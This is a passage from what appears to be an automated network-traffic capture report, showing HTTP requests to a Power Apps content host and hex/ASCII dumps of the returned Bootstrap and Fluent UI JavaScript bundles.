0a 21 66 75 6e 63 74 69 6f 6e 20 28 74 2c Data Ascii: /! Bootstrap v5.2.2 (https://getbootstrap.com/) * Copyright 2011-2022 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */!function (t,
2025-01-15 14:12:00 UTC	16384	IN	Data Raw: 5f 65 6c 65 6d 65 6e 74 2c 20 65 74 2c 20 28 28 29 20 3d 3e 20 74 68 69 73 2e 63 79 63 6c 65 28 29 29 29 20 3a 20 74 68 69 73 2e 63 79 63 6c 65 28 29 29 20 7d 20 74 6f 28 74 29 20 7b 20 63 6f 6e 73 74 20 65 20 3d 20 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 73 28 29 3b 20 69 66 20 28 74 20 3e 20 65 2e 6c 65 6e 67 74 68 20 2d 20 31 20 7c 7c 20 74 20 3c 20 30 29 20 72 65 74 75 72 6e 3b 20 69 66 20 28 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 29 20 72 65 74 75 72 6e 20 76 6f 69 64 20 50 2e 6f 6e 65 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2c 20 65 74 2c 20 28 28 29 20 3d 3e 20 74 68 69 73 2e 74 6f 28 74 29 29 29 3b 20 63 6f 6e 73 74 20 69 20 3d 20 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 68 69 73 2e 5f 67 65 74 41 63 74 69 76 65 28 29 29 Data Ascii: _element, et, (() => this.cycle())) : this.cycle()) } to(t) { const e = this._getItems(); if (t > e.length - 1 \|\| t < 0) return; if (this._isSliding) return void P.one(this._element, et, (() => this.to(t))); const i = this._getItemIndex(this._getActive())
2025-01-15 14:12:00 UTC	16384	IN	Data Raw: 6f 70 74 69 6f 6e 73 2e 73 74 72 61 74 65 67 79 20 7d 3b 20 6e 75 6c 6c 20 21 3d 20 65 2e 6d 6f 64 69 66 69 65 72 73 44 61 74 61 2e 70 6f 70 70 65 72 4f 66 66 73 65 74 73 20 26 26 20 28 65 2e 73 74 79 6c 65 73 2e 70 6f 70 70 65 72 20 3d 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 20 65 2e 73 74 79 6c 65 73 2e 70 6f 70 70 65 72 2c 20 66 65 28 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 20 63 2c 20 7b 20 6f 66 66 73 65 74 73 3a 20 65 2e 6d 6f 64 69 66 69 65 72 73 44 61 74 61 2e 70 6f 70 70 65 72 4f 66 66 73 65 74 73 2c 20 70 6f 73 69 74 69 6f 6e 3a 20 65 2e 6f 70 74 69 6f 6e 73 2e 73 74 72 61 74 65 67 79 2c 20 61 64 61 70 74 69 76 65 3a 20 72 2c 20 72 6f 75 6e 64 4f 66 66 73 65 74 73 3a 20 6c 20 7d 29 29 29 29 2c 20 6e 75 6c 6c 20 21 3d 20 Data Ascii: options.strategy }; null != e.modifiersData.popperOffsets && (e.styles.popper = Object.assign({}, e.styles.popper, fe(Object.assign({}, c, { offsets: e.modifiersData.popperOffsets, position: e.options.strategy, adaptive: r, roundOffsets: l })))), null !=
2025-01-15 14:12:00 UTC	16384	IN	Data Raw: 74 2c 20 76 69 65 77 70 6f 72 74 3a 20 54 74 2c 20 70 6f 70 70 65 72 3a 20 43 74 2c 20 72 65 66 65 72 65 6e 63 65 3a 20 4f 74 2c 20 76 61 72 69 61 74 69 6f 6e 50 6c 61 63 65 6d 65 6e 74 73 3a 20 78 74 2c 20 70 6c 61 63 65 6d 65 6e 74 73 3a 20 6b 74 2c 20 62 65 66 6f 72 65 52 65 61 64 3a 20 4c 74 2c 20 72 65 61 64 3a 20 44 74 2c 20 61 66 74 65 72 52 65 61 64 3a 20 53 74 2c 20 62 65 66 6f 72 65 4d 61 69 6e 3a 20 49 74 2c 20 6d 61 69 6e 3a 20 4e 74 2c 20 61 66 74 65 72 4d 61 69 6e 3a 20 50 74 2c 20 62 65 66 6f 72 65 57 72 69 74 65 3a 20 6a 74 2c 20 77 72 69 74 65 3a 20 4d 74 2c 20 61 66 74 65 72 57 72 69 74 65 3a 20 48 74 2c 20 6d 6f 64 69 66 69 65 72 50 68 61 73 65 73 3a 20 24 74 2c 20 61 70 70 6c 79 53 74 79 6c 65 73 3a 20 52 74 2c 20 61 72 72 6f 77 3a 20 Data Ascii: t, viewport: Tt, popper: Ct, reference: Ot, variationPlacements: xt, placements: kt, beforeRead: Lt, read: Dt, afterRead: St, beforeMain: It, main: Nt, afterMain: Pt, beforeWrite: jt, write: Mt, afterWrite: Ht, modifierPhases: $t, applyStyles: Rt, arrow:
2025-01-15 14:12:00 UTC	16384	IN	Data Raw: 64 73 20 7a 20 7b 20 63 6f 6e 73 74 72 75 63 74 6f 72 28 74 2c 20 65 29 20 7b 20 73 75 70 65 72 28 74 2c 20 65 29 2c 20 74 68 69 73 2e 5f 69 73 53 68 6f 77 6e 20 3d 20 21 31 2c 20 74 68 69 73 2e 5f 62 61 63 6b 64 72 6f 70 20 3d 20 74 68 69 73 2e 5f 69 6e 69 74 69 61 6c 69 7a 65 42 61 63 6b 44 72 6f 70 28 29 2c 20 74 68 69 73 2e 5f 66 6f 63 75 73 74 72 61 70 20 3d 20 74 68 69 73 2e 5f 69 6e 69 74 69 61 6c 69 7a 65 46 6f 63 75 73 54 72 61 70 28 29 2c 20 74 68 69 73 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 20 7d 20 73 74 61 74 69 63 20 67 65 74 20 44 65 66 61 75 6c 74 28 29 20 7b 20 72 65 74 75 72 6e 20 42 69 20 7d 20 73 74 61 74 69 63 20 67 65 74 20 44 65 66 61 75 6c 74 54 79 70 65 28 29 20 7b 20 72 65 74 75 72 6e 20 46 69 20 7d 20 73 Data Ascii: ds z { constructor(t, e) { super(t, e), this._isShown = !1, this._backdrop = this._initializeBackDrop(), this._focustrap = this._initializeFocusTrap(), this._addEventListeners() } static get Default() { return Bi } static get DefaultType() { return Fi } s
2025-01-15 14:12:00 UTC	11018	IN	Data Raw: 64 6e 20 7d 20 73 74 61 74 69 63 20 67 65 74 20 4e 41 4d 45 28 29 20 7b 20 72 65 74 75 72 6e 20 22 70 6f 70 6f 76 65 72 22 20 7d 20 5f 69 73 57 69 74 68 43 6f 6e 74 65 6e 74 28 29 20 7b 20 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 67 65 74 54 69 74 6c 65 28 29 20 7c 7c 20 74 68 69 73 2e 5f 67 65 74 43 6f 6e 74 65 6e 74 28 29 20 7d 20 5f 67 65 74 43 6f 6e 74 65 6e 74 46 6f 72 54 65 6d 70 6c 61 74 65 28 29 20 7b 20 72 65 74 75 72 6e 20 7b 20 22 2e 70 6f 70 6f 76 65 72 2d 68 65 61 64 65 72 22 3a 20 74 68 69 73 2e 5f 67 65 74 54 69 74 6c 65 28 29 2c 20 22 2e 70 6f 70 6f 76 65 72 2d 62 6f 64 79 22 3a 20 74 68 69 73 2e 5f 67 65 74 43 6f 6e 74 65 6e 74 28 29 20 7d 20 7d 20 5f 67 65 74 43 6f 6e 74 65 6e 74 28 29 20 7b 20 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 72 65 Data Ascii: dn } static get NAME() { return "popover" } _isWithContent() { return this._getTitle() \|\| this._getContent() } _getContentForTemplate() { return { ".popover-header": this._getTitle(), ".popover-body": this._getContent() } } _getContent() { return this._re

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:00 UTC	408	OUT	GET /resource/powerappsportal/dist/pcf-extended.bundle-e303d53553.js HTTP/1.1 Host: content.powerapps.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:12:01 UTC	827	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:12:00 GMT Content-Type: application/x-javascript Content-Length: 977847 Connection: close Vary: Accept-Encoding Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Strict-Transport-Security: max-age=31536000; includeSubDomains x-ms-islandgateway: GA000000X x-ms-static-content: ze000006O Timing-Allow-Origin: * X-ServiceFabric: NoRetry x-ms-service-request-id: c0790bb3-6a9f-4cc7-a583-640bcfac09c3 x-ms-correlation-id: fce72afe-416f-4d04-822c-9cfe6321d9a5 x-ms-activity-vector: 00.01.00 Server-Timing: x-ms-igw-upstream-headers;dur=45.6,x-ms-igw-req-overhead;dur=0.3 X-Content-Type-Options: nosniff x-azure-ref: 20250115T141200Z-17f859c6f6bmspknhC1MNZz6rc00000000pg000000009193 X-Cache: TCP_MISS x-fd-int-roxy-purgeid: 0 Accept-Ranges: bytes
2025-01-15 14:12:01 UTC	15557	IN	Data Raw: 76 61 72 20 5f 5f 61 73 73 69 67 6e 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 5f 5f 61 73 73 69 67 6e 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 31 2c 6f 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 3c 6f 3b 6e 2b 2b 29 66 6f 72 28 76 61 72 20 72 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 72 29 26 26 28 65 5b 72 5d 3d 74 5b 72 5d 29 3b 72 65 74 75 72 6e 20 65 7d 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 3b 21 66 75 6e 63 74 69 6f 6e Data Ascii: var __assign=this&&this.__assign\|\|function(){return(__assign=Object.assign\|\|function(e){for(var t,n=1,o=arguments.length;n<o;n++)for(var r in t=arguments[n])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};!function
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 2e 73 75 70 70 6f 72 74 4d 65 64 69 61 52 75 6c 65 73 5b 74 5d 3d 7b 7d 29 2c 65 2e 73 75 70 70 6f 72 74 4d 65 64 69 61 52 75 6c 65 73 5b 74 5d 5b 72 5d 7c 7c 28 65 2e 73 75 70 70 6f 72 74 4d 65 64 69 61 52 75 6c 65 73 5b 74 5d 5b 72 5d 3d 22 22 29 2c 65 2e 73 75 70 70 6f 72 74 4d 65 64 69 61 52 75 6c 65 73 5b 74 5d 5b 72 5d 2b 3d 6f 29 3a 28 65 2e 73 75 70 70 6f 72 74 52 75 6c 65 73 5b 72 5d 7c 7c 28 65 2e 73 75 70 70 6f 72 74 52 75 6c 65 73 5b 72 5d 3d 22 22 29 2c 65 2e 73 75 70 70 6f 72 74 52 75 6c 65 73 5b 72 5d 2b 3d 6f 29 3a 74 3f 28 65 2e 6d 65 64 69 61 52 75 6c 65 73 5b 74 5d 7c 7c 28 65 2e 6d 65 64 69 61 52 75 6c 65 73 5b 74 5d 3d 22 22 29 2c 65 2e 6d 65 64 69 61 52 75 6c 65 73 5b 74 5d 2b 3d 6f 29 3a 65 2e 72 75 6c 65 73 2b 3d 6f 7d 29 2c 65 65 Data Ascii: .supportMediaRules[t]={}),e.supportMediaRules[t][r]\|\|(e.supportMediaRules[t][r]=""),e.supportMediaRules[t][r]+=o):(e.supportRules[r]\|\|(e.supportRules[r]=""),e.supportRules[r]+=o):t?(e.mediaRules[t]\|\|(e.mediaRules[t]=""),e.mediaRules[t]+=o):e.rules+=o}),ee
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 6f 6e 74 53 69 7a 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4b 65 7d 2c 46 6f 6e 74 57 65 69 67 68 74 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 55 65 7d 2c 47 6c 6f 62 61 6c 53 65 74 74 69 6e 67 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 74 7d 2c 47 72 6f 75 70 46 6f 6f 74 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 62 7d 2c 47 72 6f 75 70 48 65 61 64 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 62 7d 2c 47 72 6f 75 70 53 68 6f 77 41 6c 6c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 62 7d 2c 47 72 6f 75 70 53 70 61 63 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 76 7d 2c 47 72 6f 75 70 65 64 4c 69 73 74 3a 66 75 6e 63 Data Ascii: ontSizes:function(){return Ke},FontWeights:function(){return Ue},GlobalSettings:function(){return yt},GroupFooter:function(){return Cb},GroupHeader:function(){return mb},GroupShowAll:function(){return vb},GroupSpacer:function(){return bv},GroupedList:func
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4d 6c 7d 2c 70 72 65 63 69 73 69 6f 6e 52 6f 75 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 55 53 7d 2c 70 72 65 73 65 6e 63 65 42 6f 6f 6c 65 61 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 69 7d 2c 72 61 69 73 65 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 47 61 7d 2c 72 65 67 69 73 74 65 72 44 65 66 61 75 6c 74 46 6f 6e 74 46 61 63 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 74 7d 2c 72 65 67 69 73 74 65 72 49 63 6f 6e 41 6c 69 61 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 6f 7d 2c 72 65 67 69 73 74 65 72 49 63 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 6f 7d Data Ascii: nt:function(){return Ml},precisionRound:function(){return US},presenceBoolean:function(){return li},raiseClick:function(){return Ga},registerDefaultFontFaces:function(){return ft},registerIconAlias:function(){return go},registerIcons:function(){return mo}
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 65 3d 4c 65 28 2d 32 30 29 2c 66 65 3d 4f 65 28 31 30 29 2c 67 65 3d 4f 65 28 32 30 29 2c 76 65 3d 4f 65 28 34 30 29 2c 62 65 3d 4f 65 28 34 30 30 29 2c 79 65 3d 4f 65 28 2d 31 30 29 2c 43 65 3d 4f 65 28 2d 32 30 29 2c 5f 65 3d 4f 65 28 2d 34 30 29 2c 53 65 3d 4f 65 28 2d 34 30 30 29 2c 78 65 3d 48 65 28 2d 31 30 29 2c 6b 65 3d 48 65 28 2d 32 30 29 2c 77 65 3d 48 65 28 31 30 29 2c 49 65 3d 48 65 28 32 30 29 2c 44 65 3d 59 28 7b 66 72 6f 6d 3a 7b 74 72 61 6e 73 66 6f 72 6d 3a 22 73 63 61 6c 65 33 64 28 2e 39 38 2c 2e 39 38 2c 31 29 22 7d 2c 74 6f 3a 7b 74 72 61 6e 73 66 6f 72 6d 3a 22 73 63 61 6c 65 33 64 28 31 2c 31 2c 31 29 22 7d 7d 29 2c 54 65 3d 59 28 7b 66 72 6f 6d 3a 7b 74 72 61 6e 73 66 6f 72 6d 3a 22 73 63 61 6c 65 33 64 28 31 2c 31 2c 31 29 22 7d Data Ascii: e=Le(-20),fe=Oe(10),ge=Oe(20),ve=Oe(40),be=Oe(400),ye=Oe(-10),Ce=Oe(-20),_e=Oe(-40),Se=Oe(-400),xe=He(-10),ke=He(-20),we=He(10),Ie=He(20),De=Y({from:{transform:"scale3d(.98,.98,1)"},to:{transform:"scale3d(1,1,1)"}}),Te=Y({from:{transform:"scale3d(1,1,1)"}
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 6f 76 65 72 65 64 3d 70 29 2c 68 26 26 28 69 2e 69 6e 70 75 74 50 6c 61 63 65 68 6f 6c 64 65 72 42 61 63 6b 67 72 6f 75 6e 64 43 68 65 63 6b 65 64 3d 68 29 2c 6d 26 26 28 69 2e 62 6f 64 79 42 61 63 6b 67 72 6f 75 6e 64 43 68 65 63 6b 65 64 3d 6d 2c 69 2e 62 6f 64 79 46 72 61 6d 65 44 69 76 69 64 65 72 3d 6d 2c 69 2e 62 6f 64 79 44 69 76 69 64 65 72 3d 6d 2c 69 2e 76 61 72 69 61 6e 74 42 6f 72 64 65 72 3d 6d 2c 69 2e 62 75 74 74 6f 6e 42 61 63 6b 67 72 6f 75 6e 64 43 68 65 63 6b 65 64 48 6f 76 65 72 65 64 3d 6d 2c 69 2e 62 75 74 74 6f 6e 42 61 63 6b 67 72 6f 75 6e 64 50 72 65 73 73 65 64 3d 6d 2c 69 2e 6c 69 73 74 49 74 65 6d 42 61 63 6b 67 72 6f 75 6e 64 43 68 65 63 6b 65 64 3d 6d 2c 69 2e 6c 69 73 74 48 65 61 64 65 72 42 61 63 6b 67 72 6f 75 6e 64 50 72 Data Ascii: overed=p),h&&(i.inputPlaceholderBackgroundChecked=h),m&&(i.bodyBackgroundChecked=m,i.bodyFrameDivider=m,i.bodyDivider=m,i.variantBorder=m,i.buttonBackgroundCheckedHovered=m,i.buttonBackgroundPressed=m,i.listItemBackgroundChecked=m,i.listHeaderBackgroundPr
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 74 61 69 6e 65 72 3a 7b 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 66 6c 65 78 22 2c 66 6c 65 78 57 72 61 70 3a 22 6e 6f 77 72 61 70 22 2c 66 6c 65 78 42 61 73 69 73 3a 22 61 75 74 6f 22 2c 68 65 69 67 68 74 3a 4e 6f 2c 77 69 64 74 68 3a 22 61 75 74 6f 22 2c 6d 69 6e 57 69 64 74 68 3a 22 30 22 2c 70 61 64 64 69 6e 67 52 69 67 68 74 3a 22 36 70 78 22 7d 2c 61 63 74 69 76 69 74 79 54 79 70 65 49 63 6f 6e 3a 7b 68 65 69 67 68 74 3a 4d 6f 2c 66 6f 6e 74 53 69 7a 65 3a 42 6f 2c 6c 69 6e 65 48 65 69 67 68 74 3a 42 6f 2c 6d 61 72 67 69 6e 54 6f 70 3a 22 33 70 78 22 7d 2c 69 73 43 6f 6d 70 61 63 74 49 63 6f 6e 3a 7b 68 65 69 67 68 74 3a 4e 6f 2c 6d 69 6e 57 69 64 74 68 3a 4e 6f 2c 66 6f 6e 74 53 69 7a 65 3a 46 6f 2c 6c 69 6e 65 48 65 69 67 68 74 3a 46 6f 2c Data Ascii: tainer:{display:"inline-flex",flexWrap:"nowrap",flexBasis:"auto",height:No,width:"auto",minWidth:"0",paddingRight:"6px"},activityTypeIcon:{height:Mo,fontSize:Bo,lineHeight:Bo,marginTop:"3px"},isCompactIcon:{height:No,minWidth:No,fontSize:Fo,lineHeight:Fo,
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 74 72 61 45 78 74 72 61 53 6d 61 6c 6c 22 2c 65 5b 65 2e 65 78 74 72 61 53 6d 61 6c 6c 3d 32 5d 3d 22 65 78 74 72 61 53 6d 61 6c 6c 22 2c 65 5b 65 2e 73 6d 61 6c 6c 3d 33 5d 3d 22 73 6d 61 6c 6c 22 2c 65 5b 65 2e 72 65 67 75 6c 61 72 3d 34 5d 3d 22 72 65 67 75 6c 61 72 22 2c 65 5b 65 2e 6c 61 72 67 65 3d 35 5d 3d 22 6c 61 72 67 65 22 2c 65 5b 65 2e 65 78 74 72 61 4c 61 72 67 65 3d 36 5d 3d 22 65 78 74 72 61 4c 61 72 67 65 22 2c 65 5b 65 2e 73 69 7a 65 38 3d 31 37 5d 3d 22 73 69 7a 65 38 22 2c 65 5b 65 2e 73 69 7a 65 31 30 3d 39 5d 3d 22 73 69 7a 65 31 30 22 2c 65 5b 65 2e 73 69 7a 65 31 36 3d 38 5d 3d 22 73 69 7a 65 31 36 22 2c 65 5b 65 2e 73 69 7a 65 32 34 3d 31 30 5d 3d 22 73 69 7a 65 32 34 22 2c 65 5b 65 2e 73 69 7a 65 32 38 3d 37 5d 3d 22 73 69 7a 65 Data Ascii: traExtraSmall",e[e.extraSmall=2]="extraSmall",e[e.small=3]="small",e[e.regular=4]="regular",e[e.large=5]="large",e[e.extraLarge=6]="extraLarge",e[e.size8=17]="size8",e[e.size10=9]="size10",e[e.size16=8]="size16",e[e.size24=10]="size24",e[e.size28=7]="size
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 76 69 74 79 50 65 72 73 6f 6e 61 2c 73 69 7a 65 3a 69 3f 59 72 2e 73 69 7a 65 31 36 3a 59 72 2e 73 69 7a 65 33 32 2c 73 74 79 6c 65 3a 73 7d 29 29 29 7d 29 2c 74 3d 75 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6e 2e 70 65 72 73 6f 6e 61 43 6f 6e 74 61 69 6e 65 72 7d 2c 72 29 7d 72 65 74 75 72 6e 20 74 7d 2c 6c 7d 72 65 74 75 72 6e 20 75 28 65 2c 74 29 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 6e 64 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 70 72 6f 70 73 2c 74 3d 65 2e 6f 6e 52 65 6e 64 65 72 49 63 6f 6e 2c 6e 3d 76 6f 69 64 20 30 3d 3d 3d 74 3f 74 68 69 73 2e 5f 6f 6e 52 65 6e 64 65 72 49 63 6f 6e 3a 74 2c 6f 3d 65 2e 6f 6e 52 65 6e 64 65 72 41 63 74 69 76 69 74 Data Ascii: vityPersona,size:i?Yr.size16:Yr.size32,style:s})))}),t=ut.createElement("div",{className:n.personaContainer},r)}return t},l}return u(e,t),e.prototype.render=function(){var e=this.props,t=e.onRenderIcon,n=void 0===t?this._onRenderIcon:t,o=e.onRenderActivit
2025-01-15 14:12:01 UTC	16384	IN	Data Raw: 7c 22 42 55 54 54 4f 4e 22 3d 3d 3d 65 2e 74 61 67 4e 61 6d 65 7c 7c 22 49 4e 50 55 54 22 3d 3d 3d 65 2e 74 61 67 4e 61 6d 65 7c 7c 22 54 45 58 54 41 52 45 41 22 3d 3d 3d 65 2e 74 61 67 4e 61 6d 65 7c 7c 22 53 45 4c 45 43 54 22 3d 3d 3d 65 2e 74 61 67 4e 61 6d 65 7c 7c 22 74 72 75 65 22 3d 3d 3d 72 7c 7c 69 29 3b 72 65 74 75 72 6e 20 74 3f 2d 31 21 3d 3d 6e 26 26 61 3a 61 7d 66 75 6e 63 74 69 6f 6e 20 4d 61 28 65 29 7b 72 65 74 75 72 6e 21 21 28 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 66 6f 63 75 73 7a 6f 6e 65 2d 69 64 22 29 29 7d 66 75 6e 63 74 69 6f 6e 20 4e 61 28 65 29 7b 72 65 74 75 72 6e 21 28 21 65 7c 7c 21 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 7c 7c 22 74 72 75 65 Data Ascii: \|"BUTTON"===e.tagName\|\|"INPUT"===e.tagName\|\|"TEXTAREA"===e.tagName\|\|"SELECT"===e.tagName\|\|"true"===r\|\|i);return t?-1!==n&&a:a}function Ma(e){return!!(e&&e.getAttribute&&e.getAttribute("data-focuszone-id"))}function Na(e){return!(!e\|\|!e.getAttribute\|\|"true

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:00 UTC	419	OUT	GET /resource/powerappsportal/dist/postpreform.BootstrapV5.bundle-11a5a91493.js HTTP/1.1 Host: content.powerapps.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:12:00 UTC	854	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:12:00 GMT Content-Type: application/x-javascript Content-Length: 164727 Connection: close Vary: Accept-Encoding Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Strict-Transport-Security: max-age=31536000; includeSubDomains x-ms-islandgateway: GA00000HO x-ms-static-content: nr0000056 Timing-Allow-Origin: * X-ServiceFabric: NoRetry x-ms-service-request-id: 06b5d495-c9f8-4c72-9a6c-3d505f29950a x-ms-correlation-id: dcee8d90-3754-4a78-aaf7-b14376b2d7fb x-ms-activity-vector: 00.01.00 Server-Timing: x-ms-igw-upstream-headers;dur=24.1,x-ms-igw-req-overhead;dur=0.4 X-Content-Type-Options: nosniff x-azure-ref: 20250115T141200Z-1848b945c76tvxskhC1MNZrzpw00000001a000000000d2re X-Cache: TCP_REMOTE_HIT x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 Accept-Ranges: bytes
2025-01-15 14:12:00 UTC	15530	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 65 2c 61 29 7b 76 61 72 20 72 3d 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 74 2c 72 29 7b 76 61 72 20 6e 3d 61 2e 44 65 66 65 72 72 65 64 28 29 3b 28 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 61 2e 61 6a 61 78 28 74 29 2e 64 6f 6e 65 28 6e 2e 72 65 73 6f 6c 76 65 29 2e 66 61 69 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 41 6a 61 78 52 65 74 72 79 20 61 74 74 65 6d 70 74 20 3a 22 2e 63 6f 6e 63 61 74 28 72 29 29 3b 72 2d 2d 3b 69 66 28 72 3e 30 29 7b 65 28 29 7d 65 6c 73 65 7b 6e 2e 72 65 6a 65 63 74 57 69 74 68 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 29 7d 29 28 29 3b 72 65 74 75 72 6e 20 6e 2e 70 72 6f 6d 69 73 65 28 29 7d 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 65 3d Data Ascii: (function(e,a){var r=[];function n(t,r){var n=a.Deferred();(function e(){a.ajax(t).done(n.resolve).fail(function(){console.log("AjaxRetry attempt :".concat(r));r--;if(r>0){e()}else{n.rejectWith(this,arguments)}})})();return n.promise()}function t(){var e=
2025-01-15 14:12:00 UTC	16384	IN	Data Raw: 61 70 70 6c 79 28 69 2c 65 29 7d 29 7d 3b 65 2e 65 78 70 6f 72 74 73 3d 74 5b 22 64 65 66 61 75 6c 74 22 5d 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3d 74 72 75 65 3b 74 5b 22 64 65 66 61 75 6c 74 22 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 72 65 67 69 73 74 65 72 48 65 6c 70 65 72 28 22 6c 6f 6f 6b 75 70 22 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 69 66 28 21 65 29 7b 72 65 74 75 72 6e 20 65 7d 72 65 74 75 72 6e 20 72 2e 6c 6f 6f 6b 75 70 50 72 6f 70 65 72 74 79 28 65 2c 74 29 7d 29 7d 3b 65 2e 65 78 70 6f 72 74 73 3d 74 5b 22 64 65 66 61 75 6c 74 22 5d 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 Data Ascii: apply(i,e)})};e.exports=t["default"]},function(e,t){"use strict";t.__esModule=true;t["default"]=function(e){e.registerHelper("lookup",function(e,t,r){if(!e){return e}return r.lookupProperty(e,t)})};e.exports=t["default"]},function(e,t,r){"use strict";var
